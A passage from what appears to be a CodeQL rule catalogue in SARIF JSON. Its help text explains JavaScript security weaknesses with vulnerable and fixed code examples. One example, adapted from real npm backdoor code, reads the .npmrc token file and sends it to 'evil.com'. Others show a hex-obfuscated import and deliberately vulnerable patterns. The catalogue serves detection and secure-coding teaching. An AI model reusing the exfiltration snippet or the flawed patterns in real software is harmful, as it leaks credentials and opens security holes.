n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n"},"properties":{"tags":["security","external/cwe/cwe-506"],"description":"Transforming hard-coded data (such as hexadecimal constants) into code\n              to be executed is a technique often associated with backdoors and should\n              be avoided.","id":"js/hardcoded-data-interpreted-as-code","kind":"path-problem","name":"Hard-coded data interpreted as code","precision":"medium","problem.severity":"error","security-severity":"9.1"}},{"id":"js/insecure-temporary-file","name":"js/insecure-temporary-file","shortDescription":{"text":"Insecure temporary file"},"fullDescription":{"text":"Creating a temporary file that is accessible by other users can lead to information disclosure and sometimes remote code execution."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n","markdown":"# Insecure temporary file\nTemporary files created in the operating system's temporary directory are by default accessible to other users. In some cases, this can lead to information exposure, or in the worst case, to remote code execution.\n\n\n## Recommendation\nUse a well-tested library like [tmp](https://www.npmjs.com/package/tmp) for creating temporary files. These libraries ensure both that the file is inaccessible to other users and that the file does not already exist.\n\n\n## Example\nThe following example creates a temporary file in the operating system's temporary directory.\n\n\n```javascript\nconst fs = require('fs');\nconst os = require('os');\nconst path = require('path');\n\nconst file = path.join(os.tmpdir(), \"test-\" + (new Date()).getTime() + \".txt\");\nfs.writeFileSync(file, \"content\");\n```\nThe file created above is accessible to other users, and there is no guarantee that the file does not already exist.\n\nThe below example uses the [tmp](https://www.npmjs.com/package/tmp) library to securely create a temporary file.\n\n\n```javascript\nconst fs = require('fs');\nconst tmp = require('tmp');\n\nconst file = tmp.fileSync().name;\nfs.writeFileSync(file, \"content\");\n```\n\n## References\n* Mitre.org: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* NPM: [tmp](https://www.npmjs.com/package/tmp).\n* Common Weakness Enumeration: [CWE-377](https://cwe.mitre.org/data/definitions/377.html).\n* Common Weakness Enumeration: [CWE-378](https://cwe.mitre.org/data/definitions/378.html).\n"},"properties":{"tags":["external/cwe/cwe-377","external/cwe/cwe-378","security"],"description":"Creating a temporary file that is accessible by other users can\n lead to information disclosure and sometimes remote code execution.","id":"js/insecure-temporary-file","kind":"path-problem","name":"Insecure temporary file","precision":"medium","problem.severity":"warning","security-severity":"7.0"}},{"id":"js/unsafe-code-construction","name":"js/unsafe-code-construction","shortDescription":{"text":"Unsafe code constructed from library input"},"fullDescription":{"text":"Using externally controlled strings to construct code may allow a malicious user to execute arbitrary code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n  return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n    return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n  return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n  return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Unsafe code constructed from library input\nWhen a library function dynamically constructs code in a potentially unsafe way, then it's important to document to clients of the library that the function should only be used with trusted inputs. If the function is not documented as being potentially unsafe, then a client may incorrectly use inputs containing unsafe code fragments, and thereby leave the client vulnerable to code-injection attacks.\n\n\n## Recommendation\nProperly document library functions that construct code from unsanitized inputs, or avoid constructing code in the first place.\n\n\n## Example\nThe following example shows two methods implemented using \\`eval\\`: a simple deserialization routine and a getter method. If untrusted inputs are used with these methods, then an attacker might be able to execute arbitrary code on the system.\n\n\n```javascript\nexport function unsafeDeserialize(value) {\n  return eval(`(${value})`);\n}\n\nexport function unsafeGetter(obj, path) {\n    return eval(`obj.${path}`);\n}\n\n```\nTo avoid this problem, either properly document that the function is potentially unsafe, or use an alternative solution such as \\`JSON.parse\\` or another library, like in the examples below, that does not allow arbitrary code to be executed.\n\n\n```javascript\nexport function safeDeserialize(value) {\n  return JSON.parse(value);\n}\n\nconst _ = require(\"lodash\");\nexport function safeGetter(object, path) {\n  return _.get(object, path);\n}\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Using externally controlled strings to construct code may allow a malicious\n              user to execute arbitrary code.","id":"js/unsafe-code-construction","kind":"path-problem","name":"Unsafe code constructed from library input","precision":"medium","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/file-access-to-http","name":"js/file-access-to-http","shortDescription":{"text":"File data in outbound network request"},"fullDescription":{"text":"Directly sending file data in an outbound network request can indicate unauthorized information disclosure."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n    https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n  hostname: \"evil.com\",\n  path: \"/upload\",\n  method: \"GET\",\n  headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n","markdown":"# File data in outbound network request\nSending local file system data to a remote URL without further validation risks uncontrolled information exposure, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example is adapted from backdoor code that was identified in two popular npm packages. It reads the contents of the `.npmrc` file (which may contain secret npm tokens) and sends it to a remote server by embedding it into an HTTP request header.\n\n\n```javascript\nvar fs = require(\"fs\"),\n    https = require(\"https\");\n\nvar content = fs.readFileSync(\".npmrc\", \"utf8\");\nhttps.get({\n  hostname: \"evil.com\",\n  path: \"/upload\",\n  method: \"GET\",\n  headers: { Referer: content }\n}, () => { });\n\n```\n\n## References\n* ESLint Blog: [Postmortem for Malicious Packages Published on July 12th, 2018](https://eslint.org/blog/2018/07/postmortem-for-malicious-package-publishes).\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n"},"properties":{"tags":["security","external/cwe/cwe-200"],"description":"Directly sending file data in an outbound network request can indicate unauthorized information disclosure.","id":"js/file-access-to-http","kind":"path-problem","name":"File data in outbound network request","precision":"medium","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/file-system-race","name":"js/file-system-race","shortDescription":{"text":"Potential file system race condition"},"fullDescription":{"text":"Separately checking the state of a file before operating on it may allow an attacker to modify the file between the two operations."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n  fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n  const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n  fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n  // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n","markdown":"# Potential file system race condition\nOften it is necessary to check the state of a file before using it. These checks usually take a file name to be checked, and if the check returns positively, then the file is opened or otherwise operated upon.\n\nHowever, in the time between the check and the operation, the underlying file referenced by the file name could be changed by an attacker, causing unexpected behavior.\n\n\n## Recommendation\nUse file descriptors instead of file names whenever possible.\n\n\n## Example\nThe following example shows a case where the code checks whether a file inside the `/tmp/` folder exists, and if it doesn't, the file is written to that location.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\nif (!fs.existsSync(filePath)) {\n  fs.writeFileSync(filePath, \"Hello\", { mode: 0o600 });\n}\n\n```\nHowever, in a multi-user environment the file might be created by another user between the existence check and the write.\n\nThis can be avoided by using `fs.open` to get a file descriptor, and then use that file descriptor in the write operation.\n\n\n```javascript\nconst fs = require(\"fs\");\nconst os = require(\"os\");\nconst path = require(\"path\");\n\nconst filePath = path.join(os.tmpdir(), \"my-temp-file.txt\");\n\ntry {\n  const fd = fs.openSync(filePath, fs.O_CREAT | fs.O_EXCL | fs.O_RDWR, 0o600);\n\n  fs.writeFileSync(fd, \"Hello\");\n} catch (e) {\n  // file existed\n}\n\n```\n\n## References\n* Wikipedia: [Time-of-check to time-of-use](https://en.wikipedia.org/wiki/Time-of-check_to_time-of-use).\n* The CERT Oracle Secure Coding Standard for C: [ FIO01-C. Be careful using functions that use file names for identification ](https://www.securecoding.cert.org/confluence/display/c/FIO01-C.+Be+careful+using+functions+that+use+file+names+for+identification).\n* NodeJS: [The FS module](https://nodejs.org/api/fs.html).\n* Common Weakness Enumeration: [CWE-367](https://cwe.mitre.org/data/definitions/367.html).\n"},"properties":{"tags":["security","external/cwe/cwe-367"],"description":"Separately checking the state of a file before operating\n              on it may allow an attacker to modify the file between\n              the two operations.","id":"js/file-system-race","kind":"problem","name":"Potential file system race condition","precision":"medium","problem.severity":"warning","security-severity":"7.7"}},{"id":"js/empty-password-in-configuration-file","name":"js/empty-password-in-configuration-file","shortDescription":{"text":"Empty password in configuration file"},"fullDescription":{"text":"Failing to set a password reduces the security of your code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n","markdown":"# Empty password in configuration file\nThe use of an empty string as a password in a configuration file is not secure.\n\n\n## Recommendation\nChoose a strong password and encrypt it if it has to be stored in a configuration file.\n\n\n## References\n* Common Weakness Enumeration: [CWE-258](https://cwe.mitre.org/data/definitions/258.html).\n* Common Weakness Enumeration: [CWE-862](https://cwe.mitre.org/data/definitions/862.html).\n"},"properties":{"tags":["security","external/cwe/cwe-258","external/cwe/cwe-862"],"description":"Failing to set a password reduces the security of your code.","id":"js/empty-password-in-configuration-file","kind":"problem","name":"Empty password in configuration file","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/remote-property-injection","name":"js/remote-property-injection","shortDescription":{"text":"Remote property injection"},"fullDescription":{"text":"Allowing writes to arbitrary properties of an object may lead to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Remote property injection\nDynamically computing object property names from untrusted input may have multiple undesired consequences. For example, if the property access is used as part of a write, an attacker may overwrite vital properties of objects, such as `__proto__`. This attack is known as *prototype pollution attack* and may serve as a vehicle for denial-of-service attacks. A similar attack vector, is to replace the `toString` property of an object with a primitive. Whenever `toString` is then called on that object, either explicitly or implicitly as part of a type coercion, an exception will be raised.\n\nMoreover, if the name of an HTTP header is user-controlled, an attacker may exploit this to overwrite security-critical headers such as `Access-Control-Allow-Origin` or `Content-Security-Policy`.\n\n\n## Recommendation\nThe most common case in which prototype pollution vulnerabilities arise is when JavaScript objects are used for implementing map data structures. This case should be avoided whenever possible by using the ECMAScript 2015 `Map` instead. When this is not possible, an alternative fix is to prepend untrusted input with a marker character such as `$`, before using it in properties accesses. In this way, the attacker does not have access to built-in properties which do not start with the chosen character.\n\nWhen using user input as part of a header name, a sanitization step should be performed on the input to ensure that the name does not clash with existing header names such as `Content-Security-Policy`.\n\n\n## Example\nIn the example below, the dynamically computed property `prop` is accessed on `myObj` using a user-controlled value.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = req.query.userControlled; // BAD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\nThis is not secure since an attacker may exploit this code to overwrite the property `__proto__` with an empty function. If this happens, the concatenation in the `console.log` argument will fail with a confusing message such as \"Function.prototype.toString is not generic\". If the application does not properly handle this error, this scenario may result in a serious denial-of-service attack. The fix is to prepend the user-controlled string with a marker character such as `$` which will prevent arbitrary property names from being overwritten.\n\n\n```javascript\nvar express = require('express');\n\nvar app = express();\nvar myObj = {}\n\napp.get('/user/:id', function(req, res) {\n\tvar prop = \"$\" + req.query.userControlled; // GOOD\n\tmyObj[prop] = function() {};\n\tconsole.log(\"Request object \" + myObj);\n});\n```\n\n## References\n* Prototype pollution attacks: [electron](https://github.com/electron/electron/pull/9287), [lodash](https://hackerone.com/reports/310443), [hoek](https://npmjs.com/advisories/566).\n* Penetration testing report: [ header name injection attack](http://seclists.org/pen-test/2009/Mar/67)\n* npm blog post: [ dangers of square bracket notation](https://github.com/nodesecurity/eslint-plugin-security/blob/3c7522ca1be800353513282867a1034c795d9eb4/docs/the-dangers-of-square-bracket-notation.md)\n* Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-250","external/cwe/cwe-400"],"description":"Allowing writes to arbitrary properties of an object may lead to\n              denial-of-service attacks.","id":"js/remote-property-injection","kind":"path-problem","name":"Remote property injection","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/client-side-request-forgery","name":"js/client-side-request-forgery","shortDescription":{"text":"Client-side request forgery"},"fullDescription":{"text":"Making a client-to-server request with user-controlled data in the URL allows a request forgery attack against the client."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + query.get('message_id');\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + Number(query.get('message_id'));\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n","markdown":"# Client-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. A client-side forged request may perform an unwanted action affecting the victim's account, or may lead to cross-site scripting if the request response is handled in an unsafe way. This is different from CSRF (cross-site request forgery), and will usually bypass CSRF protections. This is usually less severe than SSRF (server-side request forgery), as it does not expose internal services.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request used to fetch the pre-rendered HTML body of a message. It is using the endpoint `/api/messages/ID`, which is believed to respond with a safe HTML string, to be embedded in the page:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + query.get('message_id');\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\nHowever, the format of the message ID is not checked, and an attacker can abuse this to alter the endpoint targeted by the request. If they can redirect it to an endpoint that returns an untrusted value, this leads to cross-site scripting.\n\nFor example, given the query string `message_id=../pastebin/123`, the request will end up targeting the `/api/pastebin` endpoint. Or if there is an open redirect on the login page, a query string like `message_id=../../login?redirect_url=https://evil.com` could give the attacker full control over the response as well.\n\nIn example below, the input has been restricted to a number so that the endpoint cannot be altered:\n\n\n```javascript\nasync function loadMessage() {\n    const query = new URLSearchParams(location.search);\n    const url = '/api/messages/' + Number(query.get('message_id'));\n    const data = await (await fetch(url)).json();\n    document.getElementById('message').innerHTML = data.html;\n}\n\n```\n\n## References\n* OWASP: [Server-side request forgery](https://cwe.mitre.org/data/definitions/918.html)\n* OWASP: [Cross-site request forgery](https://cwe.mitre.org/data/definitions/352.html)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n"},"properties":{"tags":["security","external/cwe/cwe-918"],"description":"Making a client-to-server request with user-controlled data in the URL allows a request forgery attack\n              against the client.","id":"js/client-side-request-forgery","kind":"path-problem","name":"Client-side request forgery","precision":"medium","problem.severity":"error","security-severity":"5.0"}},{"id":"js/user-controlled-bypass","name":"js/user-controlled-bypass","shortDescription":{"text":"User-controlled bypass of security check"},"fullDescription":{"text":"Conditions that the user controls are not suited for making security-related decisions."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.cookies.loggedInUserId !== req.params.userId) {\n        // BAD: login decision made based on user controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.signedCookies.loggedInUserId !== req.params.userId) {\n        // GOOD: login decision made based on server controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n","markdown":"# User-controlled bypass of security check\nUsing user-controlled data in a permissions check may allow a user to gain unauthorized access to protected functionality or data.\n\n\n## Recommendation\nWhen checking whether a user is authorized for a particular activity, do not use data that is entirely controlled by that user in the permissions check. If necessary, always validate the input, ideally against a fixed list of expected values.\n\nSimilarly, do not decide which permission to check for, based on user data. In particular, avoid using computation to decide which permissions to check for. Use fixed permissions for particular actions, rather than generating the permission to check for.\n\n\n## Example\nIn this example, we have a server that shows private information for a user, based on the request parameter `userId`. For privacy reasons, users may only view their own private information, so the server checks that the request parameter `userId` matches a cookie value for the user who is logged in.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.cookies.loggedInUserId !== req.params.userId) {\n        // BAD: login decision made based on user controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\nThis security check is, however, insufficient since an attacker can craft their cookie values to match those of any user. To prevent this, the server can cryptographically sign the security critical cookie values:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n// ...\napp.get('/full-profile/:userId', function(req, res) {\n\n    if (req.signedCookies.loggedInUserId !== req.params.userId) {\n        // GOOD: login decision made based on server controlled data\n        requireLogin();\n    } else {\n        // ... show private information\n    }\n\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-807](https://cwe.mitre.org/data/definitions/807.html).\n* Common Weakness Enumeration: [CWE-290](https://cwe.mitre.org/data/definitions/290.html).\n"},"properties":{"tags":["security","external/cwe/cwe-807","external/cwe/cwe-290"],"description":"Conditions that the user controls are not suited for making security-related decisions.","id":"js/user-controlled-bypass","kind":"path-problem","name":"User-controlled bypass of security check","precision":"medium","problem.severity":"error","security-severity":"7.8"}},{"id":"js/log-injection","name":"js/log-injection","shortDescription":{"text":"Log injection"},"fullDescription":{"text":"Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Log injection\nIf unsanitized user input is written to a log entry, a malicious user may be able to forge new log entries.\n\nForgery can occur if a user provides some input with characters that are interpreted when the log output is displayed. If the log is displayed as a plain text file, then new line characters can be used by a malicious user. If the log is displayed as HTML, then arbitrary HTML may be included to spoof log entries.\n\n\n## Recommendation\nUser input should be suitably sanitized before it is logged.\n\nIf the log entries are in plain text then line breaks should be removed from user input, using `String.prototype.replace` or similar. Care should also be taken that user input is clearly marked in log entries.\n\nFor log entries that will be displayed in HTML, user input should be HTML-encoded before being logged, to prevent forgery and other forms of HTML injection.\n\n\n## Example\nIn the first example, a username, provided by the user, is logged using \\`console.info\\`. In the first case, it is logged without any sanitization. In the second case, the username is used to build an error that is logged using \\`console.error\\`. If a malicious user provides 